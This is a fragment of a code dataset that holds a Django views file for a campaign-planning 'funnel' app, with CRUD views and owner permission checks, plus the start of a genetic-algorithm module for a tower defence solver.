"ub.bot", "line_number": 9, "usage_type": "name"}, {"api_name": "ub.utils.admin_cmd", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "2261449235", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse, reverse_lazy\nfrom django.http import Http404\nfrom django.views.generic.list import ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import UpdateView, CreateView, DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Camp, MasterStage, Stage, \\\n    MasterTask, Task, MasterItem, Item, \\\n    MasterCollateral, Collateral\n# from .forms import ProjectForm, PicForm, LinkForm\n\n# **** Camp ****\n\nclass CampListView(LoginRequiredMixin, ListView):\n    model = Camp\n\n    def get_context_data(self, **kwargs):\n        context = super(CampListView, self).get_context_data(**kwargs)\n        try:\n            master_stages = MasterStage.objects.all()\n            context['master_stages'] = master_stages\n            print(master_stages)\n        except:\n            pass\n\n        # except Registration.DoesNotExist:\n        #     registration = None\n\n        return context\n\n\nclass CampListTreeView(LoginRequiredMixin, ListView):\n    model = Camp\n    template_name = 'funnel/camp_tree_list.html'\n\n    def get_context_data(self, **kwargs):\n        context = super(CampListTreeView, self).get_context_data(**kwargs)\n        try:\n            source_camps = Camp.objects.filter(origin__isnull=True)\n            print('Hi')\n            context['source_camps'] = source_camps\n            print(source_camps)\n        except:\n            pass\n\n        # except Registration.DoesNotExist:\n        #     registration = None\n\n        return context\n\nclass CampCreateView(LoginRequiredMixin, CreateView):\n    model=Camp\n    fields = ['title', 'departement', 'participating_num']\n\n    def form_valid(self, form):\n        obj = form.save(commit=False)\n        obj.owner = self.request.user\n        obj.save()\n\n        # populate Campaign here\n        try:\n            master_stages = MasterStage.objects.all()\n            # Create stages\n            for master_stage in master_stages:\n                stage = Stage.objects.create(\n                    title=master_stage.title,\n                    description=master_stage.description,\n                    reference=master_stage,\n                    camp=obj,\n                )\n                # create tasks\n                master_tasks = MasterTask.objects.filter(master_stage=master_stage)\n                for master_task in master_tasks:\n                    task = Task.objects.create(title=master_task.title,\n
description=master_task.description,\n                                               reference=master_task,\n                                               stage=stage,\n                                               )\n                    # create items\n                    master_items = MasterItem.objects.filter(master_task=master_task)\n                    for master_item in master_items:\n                        item = Item.objects.create(title=master_item.title,\n                                                   reference=master_item,\n                                                   task=task,\n                                                   )\n                        # create collaterals\n                        master_collaterals = MasterCollateral.objects.filter(master_item=master_item)\n                        for master_collateral in master_collaterals:\n                            collateral = Collateral.objects.create(description=master_collateral.description,\n                                                                   item=item,\n                                                                   reference=master_collateral,\n                                                                   collateral_type=master_collateral.collateral_type,\n                                                                   )\n\n        except:\n            pass\n\n\n        return super().form_valid(form)\n\n\nclass CampCreateViewFromSource(LoginRequiredMixin, CreateView):\n    model = Camp\n    fields = ['title', 'departement', 'participating_num']\n\n    def form_valid(self, form):\n        dst_camp = form.save(commit=False)\n        dst_camp.owner = self.request.user\n        dst_camp.save()\n\n        # Populate new campaign based on source campaign\n        try:\n            print('Hi')\n            src_camp = get_object_or_404(Camp, pk=self.kwargs['source_pk'])\n            print(src_camp)\n            dst_camp.origin = src_camp\n            dst_camp.save()\n\n            src_stages = Stage.objects.filter(camp=src_camp)\n            print(src_stages)\n            for src_stage in src_stages:\n                stage = Stage.objects.create(\n                    camp=dst_camp,\n                    title=src_stage.title,\n                    description=src_stage.description,\n                )\n                print(stage)\n\n                src_tasks = Task.objects.filter(stage=src_stage)\n                for src_task in src_tasks:\n                    task = Task.objects.create(\n                        title=src_task.title,\n                        description=src_task.description,\n                        stage=stage,\n                    )\n\n                    src_items = Item.objects.filter(task=src_task)\n                    for src_item in src_items:\n                        item = Item.objects.create(\n                            title=src_item.title,\n                            description=src_item.description,\n                            task=task,\n                        )\n\n                        src_collaterals = Collateral.objects.filter(item=src_item)\n                        print(src_collaterals)\n                        for src_collateral in src_collaterals:\n                            collateral = Collateral.objects.create(\n                                description=src_collateral.description,\n                                item=item,\n                                collateral_type=src_collateral.collateral_type,\n                                url=src_collateral.url,\n                                file=src_collateral.file,\n                                image=src_collateral.image,\n                            )\n        except:\n            pass\n\n        return super().form_valid(form)\n\n\n\n\nclass CampDetailView(LoginRequiredMixin, DetailView):\n    model = Camp\n\n\nclass CampUpdateView(LoginRequiredMixin, UpdateView):\n    model = Camp\n    fields = ['title', 'departement', 'participating_num']\n\n    # making sure only the owner can update\n    def get_object(self):\n        camp = super(CampUpdateView, self).get_object()\n        if not camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        return camp\n\n# *** Stage ****\n\nclass StageUpdateView(LoginRequiredMixin, UpdateView):\n    model=Stage\n    fields = ['title', 'description', 'start_ww', 'end_ww']\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.camp.pk })\n\n    def get_object(self):\n        stage = super(StageUpdateView, self).get_object()\n        if not stage.camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        return stage\n\n\nclass StageCreateView(LoginRequiredMixin, CreateView):\n    model = Stage\n    fields = ['title', 'description', 'start_ww', 'end_ww']\n\n    def form_valid(self, form):\n        obj = form.save(commit=False)\n        camp = get_object_or_404(Camp, pk=self.kwargs['camp_pk'])\n        obj.camp = camp\n        if not camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this. 
go away you hacker')\n        obj.save()\n        return super().form_valid(form)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.camp.pk })\n\n\nclass StageDeleteView(LoginRequiredMixin, DeleteView):\n    model = Stage\n\n    def dispatch(self, request, *args, **kwargs):\n        stage = get_object_or_404(Stage, pk=kwargs['pk'])\n        if request.user != stage.camp.owner:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.camp.pk })\n\n# *** Tasks ****\n\n# Create\nclass TaskCreateView(LoginRequiredMixin, CreateView):\n    model = Task\n    fields = ['title', 'description']\n\n    def form_valid(self, form):\n        obj = form.save(commit=False)\n        stage = get_object_or_404(Stage, pk=self.kwargs['stage_pk'])\n        obj.stage = stage\n        if not stage.camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        obj.save()\n        return super().form_valid(form)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.stage.camp.pk })\n        # return redirect(request.META['HTTP_REFERER'])  # broken: 'request' is undefined here and get_success_url must return a URL, not a response\n\nclass TaskDetailView(LoginRequiredMixin,DetailView):\n    model = Task\n\n# Update\nclass TaskUpdateView(LoginRequiredMixin, UpdateView):\n    model = Task\n    fields = ['title', 'description']\n\n    # here you can make your custom validation for any particular user\n    def dispatch(self, request, *args, **kwargs):\n        task = get_object_or_404(Task, pk=kwargs['pk'])\n        if request.user != task.stage.camp.owner:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.stage.camp.pk })\n\n# DELETE\nclass TaskDeleteView(LoginRequiredMixin, DeleteView):\n    model = Task\n\n    def dispatch(self, request, *args, **kwargs):\n        task = get_object_or_404(Task, pk=kwargs['pk'])\n        if request.user != task.stage.camp.owner:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.stage.camp.pk })\n\n# **** Items ******\n#CrUD\n\nclass ItemCreateView(LoginRequiredMixin, CreateView):\n    model = Item\n    fields = ['title', 'description']\n\n    def form_valid(self, form):\n        obj = form.save(commit=False)\n        task = get_object_or_404(Task, pk=self.kwargs['task_pk'])\n        obj.task = task\n        if not task.stage.camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        obj.save()\n        return super().form_valid(form)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.task.stage.camp.pk })\n\n\nclass ItemDetailView(LoginRequiredMixin, DetailView):\n    model = Item\n\n\nclass ItemUpdateView(LoginRequiredMixin, UpdateView):\n    model = Item\n    fields = ['title', 'description']\n\n    def dispatch(self, request, *args, **kwargs):\n        item = get_object_or_404(Item, pk=kwargs['pk'])\n        if request.user != item.task.stage.camp.owner:\n            raise Http404('You do not have permission to do this. 
go away you hacker')\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.task.stage.camp.pk })\n\n\nclass ItemDeleteView(LoginRequiredMixin, DeleteView):\n    model = Item\n\n    def dispatch(self, request, *args, **kwargs):\n        item = get_object_or_404(Item, pk=kwargs['pk'])\n        if request.user != item.task.stage.camp.owner:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.task.stage.camp.pk })\n\n\ndef item_complete(request, pk):\n    item = get_object_or_404(Item, pk=pk)\n    if item.task.stage.camp.owner == request.user:\n        item.complete()\n        item.save()\n    return redirect('funnel:camp_detail', pk=item.task.stage.camp.pk)\n\n\ndef item_decomplete(request, pk):\n    item = get_object_or_404(Item, pk=pk)\n    if item.task.stage.camp.owner == request.user:\n        item.decomplete()\n        item.save()\n    return redirect('funnel:camp_detail', pk=item.task.stage.camp.pk)\n\n\n# ***** Collaterals ******\nclass CollateralAddImage(LoginRequiredMixin, CreateView):\n    model = Collateral\n    fields = ['description', 'image']\n    template_name = 'funnel/image_form.html'\n\n    def form_valid(self, form):\n        obj = form.save(commit=False)\n        item = get_object_or_404(Item, pk=self.kwargs['item_pk'])\n        obj.item = item\n        obj.collateral_type = 'IM'\n        if not item.task.stage.camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this.')\n        obj.save()\n        return super().form_valid(form)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail',\n                       kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralAddFile(LoginRequiredMixin, CreateView):\n    model = Collateral\n    fields = ['description', 'file']\n    template_name = 'funnel/file_form.html'\n\n    def form_valid(self, form):\n        obj = form.save(commit=False)\n        item = get_object_or_404(Item, pk=self.kwargs['item_pk'])\n        obj.item = item\n        obj.collateral_type = 'FI'\n        if not item.task.stage.camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this.')\n        obj.save()\n        return super().form_valid(form)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail',\n                       kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralAddLink(LoginRequiredMixin, CreateView):\n    model = Collateral\n    fields = ['description', 'url']\n    template_name = 'funnel/link_form.html'\n\n    def form_valid(self, form):\n        obj = form.save(commit=False)\n        item = get_object_or_404(Item, pk=self.kwargs['item_pk'])\n        obj.item = item\n        obj.collateral_type = 'LI'\n        if not item.task.stage.camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this.')\n        obj.save()\n        return super().form_valid(form)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail',\n                       kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralUpdateImage(LoginRequiredMixin, UpdateView):\n    model = Collateral\n    fields = ['description', 'image']\n    template_name = 'funnel/image_form.html'\n\n    def get_object(self):\n        collateral = super(CollateralUpdateImage, self).get_object()\n        if not collateral.item.task.stage.camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this. 
go away you hacker')\n        return collateral\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail',\n                       kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralUpdateFile(LoginRequiredMixin, UpdateView):\n    model = Collateral\n    fields = ['description', 'file']\n    template_name = 'funnel/file_form.html'\n\n    def get_object(self):\n        collateral = super(CollateralUpdateFile, self).get_object()\n        if not collateral.item.task.stage.camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        return collateral\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail',\n                       kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralUpdateLink(LoginRequiredMixin, UpdateView):\n    model = Collateral\n    fields = ['description', 'url']\n    template_name = 'funnel/link_form.html'\n\n    def get_object(self):\n        collateral = super(CollateralUpdateLink, self).get_object()\n        if not collateral.item.task.stage.camp.owner == self.request.user:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        return collateral\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail',\n                       kwargs={'pk': self.object.item.task.stage.camp.pk })\n\n\nclass CollateralDeleteView(LoginRequiredMixin, DeleteView):\n    model = Collateral\n\n    def dispatch(self, request, *args, **kwargs):\n        collateral = get_object_or_404(Collateral, pk=kwargs['pk'])\n        if request.user != collateral.item.task.stage.camp.owner:\n            raise Http404('You do not have permission to do this. go away you hacker')\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_success_url(self):\n        return reverse('funnel:camp_detail', kwargs={'pk': self.object.item.task.stage.camp.pk })\n", "repo_name": "avisalmon/matazim", "sub_path": "funnel/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 17250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 16, "usage_type": "name"}, {"api_name": "django.views.generic.list.ListView", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 17, "usage_type": "name"}, {"api_name": "models.MasterStage.objects.all", "line_number": 22, "usage_type": "call"}, {"api_name": "models.MasterStage.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.MasterStage", "line_number": 22, 
"usage_type": "name"}, {"api_name": "models.Stage.objects.create", "line_number": 67, "usage_type": "call"}, {"api_name": "models.Stage.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.Stage", "line_number": 67, "usage_type": "name"}, {"api_name": "models.MasterTask.objects.filter", "line_number": 74, "usage_type": "call"}, {"api_name": "models.MasterTask.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "models.MasterTask", "line_number": 74, "usage_type": "name"}, {"api_name": "models.Task.objects.create", "line_number": 76, "usage_type": "call"}, {"api_name": "models.Task.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 76, "usage_type": "name"}, {"api_name": "models.MasterItem.objects.filter", "line_number": 82, "usage_type": "call"}, {"api_name": "models.MasterItem.objects", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.MasterItem", "line_number": 82, "usage_type": "name"}, {"api_name": "models.Item.objects.create", "line_number": 84, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 84, "usage_type": "name"}, {"api_name": "models.MasterCollateral.objects.filter", "line_number": 89, "usage_type": "call"}, {"api_name": "models.MasterCollateral.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.MasterCollateral", "line_number": 89, "usage_type": "name"}, {"api_name": "models.Collateral.objects.create", "line_number": 91, "usage_type": "call"}, {"api_name": "models.Collateral.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.Collateral", "line_number": 91, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 104, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 104, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 105, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 116, "usage_type": "call"}, {"api_name": "models.Camp", "line_number": 116, "usage_type": "argument"}, {"api_name": "models.Stage.objects.filter", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Stage.objects", "line_number": 121, "usage_type": "attribute"}, {"api_name": "models.Stage", "line_number": 121, "usage_type": "name"}, {"api_name": "models.Stage.objects.create", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Stage.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "models.Stage", "line_number": 124, "usage_type": "name"}, {"api_name": "models.Task.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "models.Task.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 131, "usage_type": "name"}, {"api_name": "models.Task.objects.create", "line_number": 133, "usage_type": "call"}, {"api_name": "models.Task.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 133, "usage_type": "name"}, {"api_name": "models.Item.objects.filter", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 139, "usage_type": "name"}, {"api_name": "models.Item.objects.create", "line_number": 141, "usage_type": "call"}, {"api_name": 
"models.Item.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 141, "usage_type": "name"}, {"api_name": "models.Collateral.objects.filter", "line_number": 147, "usage_type": "call"}, {"api_name": "models.Collateral.objects", "line_number": 147, "usage_type": "attribute"}, {"api_name": "models.Collateral", "line_number": 147, "usage_type": "name"}, {"api_name": "models.Collateral.objects.create", "line_number": 150, "usage_type": "call"}, {"api_name": "models.Collateral.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "models.Collateral", "line_number": 150, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 166, "usage_type": "name"}, {"api_name": "django.views.generic.detail.DetailView", "line_number": 166, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 167, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 170, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 170, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 171, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 178, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 183, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 183, "usage_type": "name"}, {"api_name": "models.Stage", "line_number": 184, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 188, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 193, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 197, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 197, "usage_type": "name"}, {"api_name": "models.Stage", "line_number": 198, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 203, "usage_type": "call"}, {"api_name": "models.Camp", "line_number": 203, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 206, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 211, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 214, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 214, "usage_type": "name"}, {"api_name": "models.Stage", "line_number": 215, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 218, "usage_type": "call"}, {"api_name": "models.Stage", "line_number": 218, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 220, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 224, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 229, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 229, "usage_type": "name"}, {"api_name": "models.Task", "line_number": 230, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 235, "usage_type": "call"}, {"api_name": "models.Stage", "line_number": 235, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 238, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 243, "usage_type": "call"}, {"api_name": 
"django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 246, "usage_type": "name"}, {"api_name": "django.views.generic.detail.DetailView", "line_number": 246, "usage_type": "name"}, {"api_name": "models.Task", "line_number": 247, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 250, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 250, "usage_type": "name"}, {"api_name": "models.Task", "line_number": 251, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 256, "usage_type": "call"}, {"api_name": "models.Task", "line_number": 256, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 258, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 262, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 265, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 265, "usage_type": "name"}, {"api_name": "models.Task", "line_number": 266, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 269, "usage_type": "call"}, {"api_name": "models.Task", "line_number": 269, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 271, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 275, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 280, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 280, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 281, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 286, "usage_type": "call"}, {"api_name": "models.Task", "line_number": 286, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 289, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 294, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 297, "usage_type": "name"}, {"api_name": "django.views.generic.detail.DetailView", "line_number": 297, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 298, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 301, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 301, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 302, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 306, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 306, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 308, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 312, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 315, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 315, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 316, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 319, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 319, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 321, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 325, "usage_type": "call"}, {"api_name": 
"django.shortcuts.get_object_or_404", "line_number": 329, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 329, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 333, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 337, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 337, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 341, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 345, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 345, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 346, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 352, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 352, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 356, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 361, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 365, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 365, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 366, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 372, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 372, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 376, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 381, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 385, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 385, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 386, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 392, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 392, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 396, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 401, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 405, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 405, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 406, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 413, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 417, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 421, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 421, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 422, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 429, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 433, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 437, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 437, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 438, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 445, "usage_type": "call"}, {"api_name": 
"django.urls.reverse", "line_number": 449, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 453, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 453, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 454, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 457, "usage_type": "call"}, {"api_name": "models.Collateral", "line_number": 457, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 459, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 463, "usage_type": "call"}]} +{"seq_id": "36753525004", "text": "# BO 2021\n# Authors: Łukasz Kita, Mateusz Pawłowicz, Michał Szczepaniak, Marcin Zięba\n\"\"\"\nTower Defence Solver.\n\nGenetic operations.\n\"\"\"\nimport copy\nimport numpy as np\nimport tower_defence_solver.utils as utils\nfrom tower_defence_solver.candidate import Candidate\nfrom tower_defence_solver import TowerDefenceSolver\nfrom typing import List, Dict, Tuple, Optional, Union\n\nPurchases = List[Dict]\nMAX_TRIES = 10\n\n\n# ========== UNARY OPERATORS ==========\n\n\ndef addition(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n \"\"\"\n Returns candidate with purchases list the same as origin's purchase list\n concatenated with additional single purchase.\n\n :param game: Instance of tower defence emulator\n :param origin: candidate, on whose purchases list new candidate purchased will be based on\n :return: candidate with newly added purchase if possible, None otherwise\n \"\"\"\n time = origin.time\n new_purchases = copy.deepcopy(origin.initial_purchases)\n position = utils.get_random_position_near_path(\n game, game.map_height // 2, game.map_width // 2, origin.initial_purchases, game.map_height * game.map_width\n )\n if position is None:\n return None\n tower_id = np.random.choice(list(game.tower_types.keys()))\n to_be_added = {\"time\": utils.get_random_purchase_time(time), \"coords\": position, \"type\": tower_id}\n new_purchases.append(to_be_added)\n new_purchases = sorted(new_purchases, key=lambda x: x[\"time\"])\n return Candidate(new_purchases, game, time=time)\n\n\ndef deletion(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n \"\"\"\n Returns candidate with purchases list the same as origin's purchase list, but with one purchase missing\n The purchase to be deleted is taken from these purchases, which had a chance to be done,\n but if there are no such a purchases, it will be randomly taken from the whole purchases list.\n\n :param game: Instance of tower defence emulator\n :param origin: candidate, on whose purchases list new candidate purchased will be based on\n :return: candidate with delete purchase if possible, None otherwise\n \"\"\"\n time = origin.time\n (\n purchases_before_simulation_has_finished,\n purchases_after_simulation_has_finished,\n ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(1, time, origin.initial_purchases)\n\n if purchases_before_simulation_has_finished is None:\n return None\n\n id_to_be_removed = np.random.choice(len(purchases_before_simulation_has_finished))\n new_purchases = purchases_before_simulation_has_finished.copy()\n new_purchases.pop(id_to_be_removed)\n new_purchases.extend(purchases_after_simulation_has_finished)\n\n return Candidate(new_purchases, game, time=time)\n\n\ndef permutation(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n \"\"\"\n 
